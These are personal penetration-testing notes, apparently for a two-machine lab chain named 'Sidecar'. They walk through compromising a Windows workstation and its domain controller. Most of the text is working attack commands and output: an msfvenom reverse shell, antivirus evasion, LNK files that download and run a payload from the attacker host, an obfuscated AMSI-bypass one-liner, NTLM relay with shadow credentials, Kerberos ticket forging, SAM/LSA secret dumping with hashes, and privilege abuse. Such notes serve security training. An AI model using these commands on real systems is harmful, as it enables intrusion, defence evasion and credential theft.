Sidecar (Chain)

This is not a writeup, just my notes about the machine.

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username	Password	Method	Scope
svc_deploy	Aces&Eights	Dump SAM + LSA + Hashcat	Domain User

✅ Valid Usernames

vc_deploy

🔑 Passwords list

Aces&Eights

Information Gathering

Nmap Scan

Service Enumeration

10.10.220.53

DNS

• Not vulnerable to DNS Zone Transfer

SMB (Enum4linux-ng)

• Parent/Root Domain

• NetBIOS: DC01

• Domain: Sidecar.vl

• FQDN: DC01.Sidecar.vl

• Domain SID: S-1-5-21-3976908837-939936849-1028625813

• SMB signing: true (Not vulnerable to NTLM Relay)

• Server allows null session authentication

• Server allows guest session authentication

10.10.220.54

SMB (Enum4linux-ng)

• NetBIOS: WS01

• FQDN: ws01.Sidecar.vl

• SMB signing: false (vulnerable to ntlm relay)

Compromising WS01

Discovering a share folder with excessive permission

During the enumeration the tester found that guest authentication was enabled into the server allows to enumerate the SMB shares. Additionally, it was discovered that Public share allows Read and Write permissions.

❯ nxc smb DC01 -u 'Intrusionz3r0' -p '' --shares
SMB         10.10.220.53   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB         10.10.220.53   445    DC01             [+] Sidecar.vl\Intrusionz3r0: (Guest)
SMB         10.10.220.53   445    DC01             [*] Enumerated shares
SMB         10.10.220.53   445    DC01             Share           Permissions     Remark
SMB         10.10.220.53   445    DC01             -----           -----------     ------
SMB         10.10.220.53   445    DC01             ADMIN$                          Remote Admin
SMB         10.10.220.53   445    DC01             C$                              Default share
SMB         10.10.220.53   445    DC01             IPC$            READ            Remote IPC
SMB         10.10.220.53   445    DC01             NETLOGON                        Logon server share 
SMB         10.10.220.53   445    DC01             Public          READ,WRITE      
SMB         10.10.220.53   445    DC01             SYSVOL                          Logon server share 

Initial foothold on WS01

Bypassing Windows Defender using DSViper

During the enumeration the tester attempted to obtain a reverse shell but the AV was enabled into the system preventing the execution or malicious software. The tester proceeded to bypass the detection using DSViper

Creating shellcode using msfvenom

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.48 LPORT=1234 -f raw > payload.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes

Using DSViper to create final payload

❯ ./DSViper

            

░▒▓███████▓▒░ ░▒▓███████▓▒░      ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░             ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░              ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░        ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░░▒▓██████▓▒░ ░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░      ░▒▓█▓▒░        ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░      ░▒▓█▓▒░        ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░          ░▒▓██▓▒░  ░▒▓█▓▒░▒▓█▓▒░      ░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░ 
                                                                                             
................................................ 
                      AntiVirus Bypass Tool (v.0.2.1)   
---------------------------------------------------------
Created by Dhanush Gowda(dagowda) and Sumanth Vankineni
---------------------------------------------------------
................................................


You sure you want to Continue?(Use it ethically, and in lab enviroments only) y/n: y
Enter your payload choice:
1.)self-injection(XOR)
2.)self-injection(AES)
3.)Process Injection(spoolsv)(Can be used for lateral movement)
4.)Process Hollow
5.)Self Deleting Malware(HAVE TO WAIT, CLOSE TO A MINUTE FOR THE PAYLOAD TO EXECUTE)
6.)DLL side-load/rundll32 applocker bypass
7.)Process Injection(explorer.exe)
8.)Powershell(Will bypass with cloud detections enabled as well)(Make sure to run this payload twice)(use x64 payload only)
9.)Applocker bypass small shellcodes(Make sure to use x86 payloads)(Also make sure to change the .exe file name after everyrun on the same victim)(Make sure you run this payload twice)
10.)Applocker bypass Havoc/large shellcodes(use x86 payloads only)
11.)Indirect Syscall(Windows 10)(Possible EDR bypass loader)
>1
Please type in the shellcode file name: payload.bin
Selected self-injection(XOR)


[*]Payload successfully created as DSViper_xor.exe

Creating malicious Lnk files

The tester proceeded to create two malicious Lnk files:

Download payload: C:\Windows\System32\cmd.exe /c powershell IWR http://10.8.5.48:8080/DSViper_xor.exe -Outfile C:\Windows\Temp\DSViper_xor.exe

Execute payload: C:\Windows\System32\cmd.exe /c C:\Windows\Temp\DSViper_xor.exe

Upload malicious files and obtaing a reverse shell on WS01

Compromising WS01 as Administrator

Enumerating Security Protections on WS01

C:\Windows\System32>wmic /namespace:\\root\SecurityCenter2 path AntivirusProduct GET displayName, productState
displayName       productState  
Windows Defender  397568

C:\Windows\System32>cmd.exe /c powershell Get-MPComputerStatus | findstr "True"
AMServiceEnabled                : True
AntispywareEnabled              : True
AntivirusEnabled                : True
BehaviorMonitorEnabled          : True
IoavProtectionEnabled           : True
NISEnabled                      : True
OnAccessProtectionEnabled       : True
RealTimeProtectionEnabled       : True

C:\Windows\System32>

Obtaining reverse shell using sliver

Undetectable payload:

c:\Temp> C:\Windows\System32\cmd.exe /c powershell IWR -URI http://10.8.5.48:8080/Loader.exe -Outfile C:\Temp\Loader.exe
c:\Temp> Loader.exe

Turning On WebDav

During the post-enumeration the tester discovered an WebDAV that was subsequently enabled.

Starting WebClient service using net use command:

C:\Windows\System32>  WS01
[x] Unable to reach DAV pipe on WS01, system is either unreachable or does not have WebClient service running

#Start the WebClient service (WebDAV)
C:\Windows\System32> net use x: http://10.8.5.48/

C:\Windows\System32> GetWebDAVStatus.exe WS01
[+] WebClient service is active on WS01

Starting WebClient service using c2tc-startwebclient .

sliver (COMBINED_AGLET) > c2tc-startwebclient

[*] Successfully executed c2tc-startwebclient (coff-loader)
[*] Got output:
[+] WebClient service started successfully.

NTLM Relay attack via WebDav + Shadows Credentials

To successfully carry out this attack, the environment must have the following misconfigurations:

• LDAP Signing is NOT enforced

• LDAPS Channel Binding is set to "NEVER"

• MachineAccountQuota > 0 — if not, proceed with Shadow Credentials instead.

• Valid NetBIOS name resolution via Responder

• Intranet zone conditions has to be meet.

  • Which means add our Computer to the domain using the NetBIOS provided by Responder

1. Bypassing AMSI

Option 1#: Using PowerJoker to obtain a stable powershell and use amsi.fail to generate PowerShell snippets that break or disable AMSI for the current process.

JokerShell C:\Windows\System32> $fTCfcRn66rylI=$null;$vjG66BCc="System.$([chaR]([bYte]0x4d)+[char](80+17)+[chAR](110*107/107)+[cHAR](9+88)+[chaR](103)+[CHAR](101+1-1)+[ChaR]([bytE]0x6d)+[ChaR](101)+[cHAR](110*95/95)+[cHAR]([bYTE]0x74)).$([CHaR]([byTE]0x41)+[chAR](113+4)+[chAR](116+102-102)+[Char](111*17/17)+[chaR]([BYtE]0x6d)+[char](97)+[cHaR]([BytE]0x74)+[cHar]([BYte]0x69)+[cHAr]([BYTE]0x6f)+[cHar](79+31)).$([Char](44+21)+[chAr]([BytE]0x6d)+[ChaR](19+96)+[chAr]([ByTe]0x69)+[CHAR](85*2/2)+[chAr](103+13)+[cHAr]([BYte]0x69)+[CHAr]([BYtE]0x6c)+[ChAr](115+21-21))";$bnhvzzbaphtc="+[ChaR](116*3/3)+[CHAR](114+109-109)+[ChAR](107+62-62)+[ChaR]([byTE]0x6c)+[CHaR](100*68/68)+[CHAr](122*107/107)+[ChAr]([BYtE]0x77)+[CHAR](106*44/44)+[cHaR](73+49)+[char]([bYTE]0x70)+[cHar](103*68/68)+[CHaR](16+106)+[chAR](104+34-34)+[cHaR](115)+[char]([bYTE]0x67)+[char](119*53/53)+[cHaR](77+22)+[cHAR]([BYTE]0x76)+[Char](112*9/9)+[CHaR]([BYtE]0x6a)+[cHar]([bYTe]0x6d)+[cHar](107*104/104)+[CHar](109+57-57)+[CHaR]([BYTE]0x63)+[Char](117*78/78)";[Threading.Thread]::Sleep(876);[Ref].Assembly.GetType($vjG66BCc).GetField($([cHAr](68+29)+[ChaR]([byTe]0x6d)+[ChAr]([ByTe]0x73)+[CHAR]([BYTe]0x69)+[cHaR](31+42)+[cHar]([BytE]0x6e)+[cHAR]([byTE]0x69)+[chAr]([ByTE]0x74)+[ChaR]([BYtE]0x46)+[CHaR](97+90-90)+[Char](105*98/98)+[ChaR]([bYte]0x6c)+[ChAr](101)+[cHaR](64+36)),"NonPublic,Static").SetValue($fTCfcRn66rylI,$true);$sjnzezl="+('èsèîny'+'wpyppl'+'fûvlhá'+'z').norMaLIZe([Char](70*18/18)+[chaR]([BYTe]0x6f)+[ChAr]([byTe]0x72)+[cHar]([BYte]0x6d)+[Char]([BYTE]0x44)) -replace [ChAR]([BytE]0x5c)+[cHAr]([bYte]0x70)+[Char]([bytE]0x7b)+[Char]([Byte]0x4d)+[cHar](110*59/59)+[chAr](125*98/98)";[Threading.Thread]::Sleep(579)

Option 2#Using Donut + UnmanagedPowerShell + Sliver

~/Documents/Tools/donut/donut -a 2 -i UnmanagedPowerShell.exe -o UnmanagedPowerShell.bin

  [ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "UnmanagedPowerShell.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : amd64
  [ AMSI/WDLP/ETW : continue
  [ PE Headers    : overwrite
  [ Shellcode     : "UnmanagedPowerShell.bin"
  [ Exit          : Thread

sliver (COMBINED_AGLET) > execute-shellcode -i /home/Intrusionz3r0/Documents/Tools/UnmanagedPowerShell.bin

[*] Started remote shell with pid 3284

PS > 

2. Evaluating the environment to choise the attack path

Due machineaccountquota is set in 0, the tester proceeded to use shadow credentials instead.

#Using StandIn
sliver (COMBINED_AGLET) > execute-assembly /home/Intrusionz3r0/Documents/Tools/StandIn_v13_Net45.exe --object ms-DS-MachineAccountQuota=*
#Using sharpview 
sliver (COMBINED_AGLET) > sharpview -- Get-DomainObject -SearchBase "DC=sidecar,DC=vl" -LDAPFilter "(objectClass=domain)" -Properties ms-DS-MachineAccountQuota
ms-ds-machineaccountquota      : 0

3. Starting Responder to generate a valid NetBIOS

❯ sudo responder -I tun0 -w -d
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

 [+] Current Session Variables:
    Responder Machine Name     [WIN-BSET2PBW1EP]
    Responder Domain Name      [DLRP.LOCAL]
    Responder DCE-RPC Port     [48249]

Addinjg a Malicious DNS

Option #1: Using Sharpmad.exe via sliver

sliver (COMBINED_AGLET) > execute-assembly /home/Intrusionz3r0/Documents/Tools/Sharpmad.exe ADIDNS -Action new -Tombstone -Verbose -Node WIN-5MZA8QBSA8R -Data 10.8.5.48

[*] Output:
[+] Domain Controller = DC01.Sidecar.vl
[+] Domain = sidecar.vl
[+] Forest = sidecar.vl
[+] ADIDNS Zone = sidecar.vl
[+] Distinguished Name = DC=WIN-5MZA8QBSA8R,DC=sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=sidecar,DC=vl
[+] SOA serial number = 277
[+] DNSRecord = 04-00-01-00-05-F0-00-00-15-01-00-00-00-00-02-58-00-00-00-00-C4-C1-38-00-0A-08-05-30
[+] ADIDNS node WIN-BSET2PBW1EP added

Option #2: Using UnmanagedPowerShell.

This tools is precharged with PowerView, PowerUp, PowerUpSQL and Powermad.

sliver (COMBINED_AGLET) > execute-shellcode -i /home/Intrusionz3r0/Documents/Tools/UnmanagedPowerShell.bin

[*] Started remote shell with pid 2200

PS > New-ADIDNSNode -Tombstone -Verbose -Node WIN-BSET2PBW1EP -Data 10.8.5.48    
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=WIN-BSET2PBW1EP,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1A-01-00-00-00-00-02-58-00-00-00-00-D5-C1-38-00-0A-08-05-30
[+] ADIDNS node WIN-BSET2PBW1EP added

Option #3: Using PowerJoker to obtain a stable powershell and use amsi.fail to generate PowerShell snippets that break or disable AMSI for the current process.

JokerShell C:\> $fTCfcRn66rylI=$null;$vjG66BCc="System.$([chaR]([bYte]0x4d)+[char](80+17)+[chAR](110*107/107)+[cHAR](9+88)+[chaR](103)+[CHAR](101+1-1)+[ChaR]([bytE]0x6d)+[ChaR](101)+[cHAR](110*95/95)+[cHAR]([bYTE]0x74)).$([CHaR]([byTE]0x41)+[chAR](113+4)+[chAR](116+102-102)+[Char](111*17/17)+[chaR]([BYtE]0x6d)+[char](97)+[cHaR]([BytE]0x74)+[cHar]([BYte]0x69)+[cHAr]([BYTE]0x6f)+[cHar](79+31)).$([Char](44+21)+[chAr]([BytE]0x6d)+[ChaR](19+96)+[chAr]([ByTe]0x69)+[CHAR](85*2/2)+[chAr](103+13)+[cHAr]([BYte]0x69)+[CHAr]([BYtE]0x6c)+[ChAr](115+21-21))";$bnhvzzbaphtc="+[ChaR](116*3/3)+[CHAR](114+109-109)+[ChAR](107+62-62)+[ChaR]([byTE]0x6c)+[CHaR](100*68/68)+[CHAr](122*107/107)+[ChAr]([BYtE]0x77)+[CHAR](106*44/44)+[cHaR](73+49)+[char]([bYTE]0x70)+[cHar](103*68/68)+[CHaR](16+106)+[chAR](104+34-34)+[cHaR](115)+[char]([bYTE]0x67)+[char](119*53/53)+[cHaR](77+22)+[cHAR]([BYTE]0x76)+[Char](112*9/9)+[CHaR]([BYtE]0x6a)+[cHar]([bYTe]0x6d)+[cHar](107*104/104)+[CHar](109+57-57)+[CHaR]([BYTE]0x63)+[Char](117*78/78)";[Threading.Thread]::Sleep(876);[Ref].Assembly.GetType($vjG66BCc).GetField($([cHAr](68+29)+[ChaR]([byTe]0x6d)+[ChAr]([ByTe]0x73)+[CHAR]([BYTe]0x69)+[cHaR](31+42)+[cHar]([BytE]0x6e)+[cHAR]([byTE]0x69)+[chAr]([ByTE]0x74)+[ChaR]([BYtE]0x46)+[CHaR](97+90-90)+[Char](105*98/98)+[ChaR]([bYte]0x6c)+[ChAr](101)+[cHaR](64+36)),"NonPublic,Static").SetValue($fTCfcRn66rylI,$true);$sjnzezl="+('èsèîny'+'wpyppl'+'fûvlhá'+'z').norMaLIZe([Char](70*18/18)+[chaR]([BYTe]0x6f)+[ChAr]([byTe]0x72)+[cHar]([BYte]0x6d)+[Char]([BYTE]0x44)) -replace [ChAR]([BytE]0x5c)+[cHAr]([bYte]0x70)+[Char]([bytE]0x7b)+[Char]([Byte]0x4d)+[cHar](110*59/59)+[chAr](125*98/98)";[Threading.Thread]::Sleep(579)
JokerShell C:\> Import-Module .\Powermad.ps1
JokerShell C:\> New-ADIDNSNode -Tombstone -Verbose -Node WIN-BSET2PBW1EP -DATA 10.8.5.48

Running ntlmrelayx to redirect the authentication

❯ ntlmrelayx.py -t ldaps://DC01.sidecar.vl -smb2support --adcs --shadow-credentials --shadow-target ws01\$
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections

Coercing the authentication against domain controller

sliver (COMBINED_AGLET) > execute-assembly /home/Intrusionz3r0/Documents/Tools/SpoolSample.exe 10.10.220.54 "WIN-BSET2PBW1EP@80/Intrusionz3r0.txt"

Output:

*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Connection from 10.10.220.54 controlled, attacking target ldaps://DC01.sidecar.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Authenticating against ldaps://DC01.sidecar.vl as SIDECAR/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Connection from 10.10.220.54 controlled, attacking target ldaps://DC01.sidecar.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] Searching for the target account
[*] Target user found: CN=WS01,CN=Computers,DC=Sidecar,DC=vl
[*] Generating certificate
[*] HTTPD(80): Authenticating against ldaps://DC01.sidecar.vl as SIDECAR/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Certificate generated
[*] Generating KeyCredential
[*] Updating the msDS-KeyCredentialLink attribute of ws01$
[*] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Saved PFX (#PKCS12) certificate & key at path: jwtHNq1B.pfx
[*] Must be used with password: ogkkN1eOSsZYekxP3yoK
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[*] Run the following command to obtain a TGT
[*] python3 PKINITtools/gettgtpkinit.py -cert-pfx jwtHNq1B.pfx -pfx-pass ogkkN1eOSsZYekxP3yoK Sidecar.vl/ws01$ jwtHNq1B.ccache

Requesting a Kerberos TGT Using Certificate-Based Authentication (PKINIT)

❯ python3 ~/Documents/Tools/PKINITtools/gettgtpkinit.py -cert-pfx jwtHNq1B.pfx -pfx-pass ogkkN1eOSsZYekxP3yoK 'Sidecar.vl/ws01$' jwtHNq1B.ccache
2025-05-02 16:52:42,718 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-05-02 16:52:42,730 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-05-02 16:52:58,213 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-05-02 16:52:58,213 minikerberos INFO     6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9
INFO:minikerberos:6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9
2025-05-02 16:52:58,215 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Retrieving NT hash WS01$ computer account

❯ KRB5CCNAME='jwtHNq1B.ccache' python3 ~/Documents/Tools/PKINITtools/getnthash.py -k 6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9 'Sidecar.vl/ws01$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
31fc45654028564d0ceda3817829d52f

Obtaining Domain Controller SID

#UnmanagedPowerShell
PS > Get-DomainSID
S-1-5-21-3976908837-939936849-1028625813

#Using Sharpview
sliver (COMBINED_AGLET) > sharpview -- Get-DomainSID

[*] sharpview output:
[Get-DomainSearcher] search base: LDAP://DC=SIDECAR,DC=VL
[Get-DomainComputer] Using additional LDAP filter: (userAccountControl:1.2.840.113556.1.4.803:=8192)
[Get-DomainComputer] Get-DomainComputer filter string: (&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=8192))
S-1-5-21-3976908837-939936849-1028625813

Crafting Silver ticket for Local Administrator via S4U

#From Windows using rubeus.exe
Rubeus.exe asktgt /nowrap /user:"ws01$" /rc4:31fc45654028564d0ceda3817829d52f
Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /altservice:"host/ws01.sidecar.vl" /ticket:<ticket>

# From Linux
#Using PKINITtools
❯  python3 gets4uticket.py kerberos+ccache://sidecar.vl\\WS01\$:jwtHNq1B.ccache@DC01.sidecar.vl host/WS01.sidecar.vl@sidecar.vl Administrator@sidecar.vl Administrator.ccache -v
INFO:minikerberos:Trying to get SPN with Administrator@sidecar.vl for host/WS01.sidecar.vl@sidecar.vl
2024-02-16 01:41:58,209 minikerberos INFO     Success!
INFO:minikerberos:Success!
2024-02-16 01:41:58,209 minikerberos INFO     Done!
INFO:minikerberos:Done!

#Using impacket toolkit
❯ impacket-ticketer -domain-sid S-1-5-21-3976908837-939936849-1028625813 -nthash 31fc45654028564d0ceda3817829d52f -domain sidecar.vl -spn host/ws01.sidecar.vl -user-id 500 administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sidecar.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache

Dumping local SAM Hashes LSA Secrets on WS01

❯ KRB5CCNAME='administrator.ccache' impacket-secretsdump -k -no-pass WS01.sidecar.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1e7d0e7d432413f4ac3097f112b17322
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a7eb14088fd30c1af40ff91acd7734ce:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Admin:1000:aad3b435b51404eeaad3b435b51404ee:09e8df317667fc45698f7db80c58fd3f:::
Deployer:1001:aad3b435b51404eeaad3b435b51404ee:c5ad69fd899918450831c9d2b23f27a1:::
[*] Dumping cached domain logon information (domain/username:hash)
SIDECAR.VL/E.Klaymore:$DCC2$10240#E.Klaymore#66e0fb1767fe4f00983784904ad42579: (2025-05-02 21:01:00)
SIDECAR.VL/Administrator:$DCC2$10240#Administrator#0105946ef533599c2b1b769f3d9016dd: (2023-12-02 11:27:44)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
SIDECAR\WS01$:plain_password_hex:1880a0f624b99fb13150deef1afba09a3590e0e778518cb3cb48cdb23b1ab50c87bba5ce15d4b7c3d0decaad51e242b0d852f85f7672ae293c87d5412a1ea19751c0ad8b496ea343aeaf428b1b04a22e5066b7d2665da598e5dfafa827df1e5e916c1a65ea28acc6a9d9caf8bdf021760d6581f550cfe932dfe842eee145bd0ebcb64f0841825d0ed65c2a9c2a7c131b2a3e614070d89d480e7996a8cbfb28996f6c3df4155641ffda9caf6d014499cec3d7520de7418f977465a42be2cc1e73447d213ae782f119ff8b9d01c8517f1447ca6b5fa42349086ecdb67c949b7fa36fa05a3d6c38fa5440bf08c82db6db10
SIDECAR\WS01$:aad3b435b51404eeaad3b435b51404ee:31fc45654028564d0ceda3817829d52f:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x5f9303f91320d51860ac3a1313e79027a226ec34
dpapi_userkey:0x21fd9a9c71f6b32d717142ca71212c70c33bf4d3
[*] NL$KM 
 0000   48 35 C4 FE DA 3E 65 75  57 78 B9 E8 26 12 99 AD   H5...>euWx..&...
 0010   C3 C9 10 90 E7 7E 77 ED  91 66 BB 10 28 15 FF 24   .....~w..f..(..$
 0020   6E 20 0C A9 6A A1 82 8D  EA 3E FC B5 DB 18 F9 0B   n ..j....>......
 0030   3C 62 FD 18 AE 7C B4 C5  AA 06 E6 4E D9 1F 27 85   <b...|.....N..'.
NL$KM:4835c4feda3e65755778b9e8261299adc3c91090e77e77ed9166bb102815ff246e200ca96aa1828dea3efcb5db18f90b3c62fd18ae7cb4c5aa06e64ed91f2785
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

Obtaining a shell as Administrator

❯ KRB5CCNAME='administrator.ccache' impacket-wmiexec -k -no-pass WS01.sidecar.vl  -shell-type powershell
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> C:\Temp\Loader.exe

Compromising domain controller

Initial Foothold on DC01

Discovering a valid user domain

During enumeration, the tester found the domain user svc_deploy, which appears similar to the local user Deployer found on WS01. This could indicate that they are the same user and may share the same credentials.

❯ nxc smb DC01 -u 'svc_deploy' -H 'c5ad69fd899918450831c9d2b23f27a1'
SMB         10.10.220.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB         10.10.220.53    445    DC01             [+] Sidecar.vl\svc_deploy:c5ad69fd899918450831c9d2b23f27a1 
❯ nxc winrm DC01 -u 'svc_deploy' -H 'c5ad69fd899918450831c9d2b23f27a1'
WINRM       10.10.220.53    5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:Sidecar.vl)
WINRM       10.10.220.53    5985   DC01             [+] Sidecar.vl\svc_deploy:c5ad69fd899918450831c9d2b23f27a1 (Pwn3d!)

Cracking svc_deploy's NTLM hash

❯ hashcat -m 1000 'c5ad69fd899918450831c9d2b23f27a1' /usr/share/wordlists/rockyou.txt

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

c5ad69fd899918450831c9d2b23f27a1:Aces&Eights  

Found: svc_deploy:Aces&Eights

Compromise Domain controler via SeTcbPrivilege

Discovering SeTcbPrivilege token privilege enabled

The user possesses SeTcbPrivilege ("") which means that can impersonation a token for any other user without knowing the credentials, add an arbitrary group (admins) to the token, set the integrity level of the token to "medium", and assign this token to the current thread (SetThreadToken).

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeTcbPrivilege                Act as part of the operating system Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

Abusing of SeTcbPrivilege via TcbElevation

Script: https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178

#Compile: Open Developer Command prompt for VS
cl TcbElevation.cpp /D_UNICODE /DUNICODE /EHsc /link Secur32.lib Advapi32.lib

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> .\TcbElevation.exe rev C:\Users\svc_deploy\Documents\Loader.exe